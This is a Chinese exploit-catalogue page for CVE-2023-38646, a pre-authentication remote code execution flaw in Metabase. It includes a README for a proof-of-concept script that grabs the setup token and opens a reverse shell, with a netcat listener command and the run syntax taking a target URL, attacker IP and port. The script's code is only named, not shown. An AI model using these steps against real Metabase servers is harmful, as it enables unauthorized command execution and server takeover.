POC详情: b0c3b12014f5fe41340e2af2397f1e8ad7aa8a96

来源
关联漏洞
标题: Metabase 安全漏洞 (CVE-2023-38646)
描述:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。
描述
Metabase Pre-Auth RCE POC
介绍
# Metabase Pre-Auth RCE POC - CVE-2023-38646
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server. I have written the script directly to gain reverse shell on the attacker's machine.

## Usage
The script require the Target URL, Attackers IP and Port. Providing the setup token is not required for this exploit as the script tries to obtain it from `/api/session/properties`.

Make sure to start netcat listener on Attacker machine, using the following command : 
`nc -nlvp {Port}`

Run the POC Script with:
- -u  - Target URL (Metabase)
- -ip  - Attacker IP
- -p  - Port Number  
```python
python3 CVE-2023-38646.py -u <target-url> -ip <IP> -p <PORT>
```
 
 
 
![POC](https://i.imgur.com/BE7nuAml.png)

## References
- https://github.com/m3m0o/metabase-pre-auth-rce-poc/
- https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
文件快照

[4.0K] /data/pocs/b0c3b12014f5fe41340e2af2397f1e8ad7aa8a96 ├── [1.9K] CVE-2023-38646.py └── [ 917] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。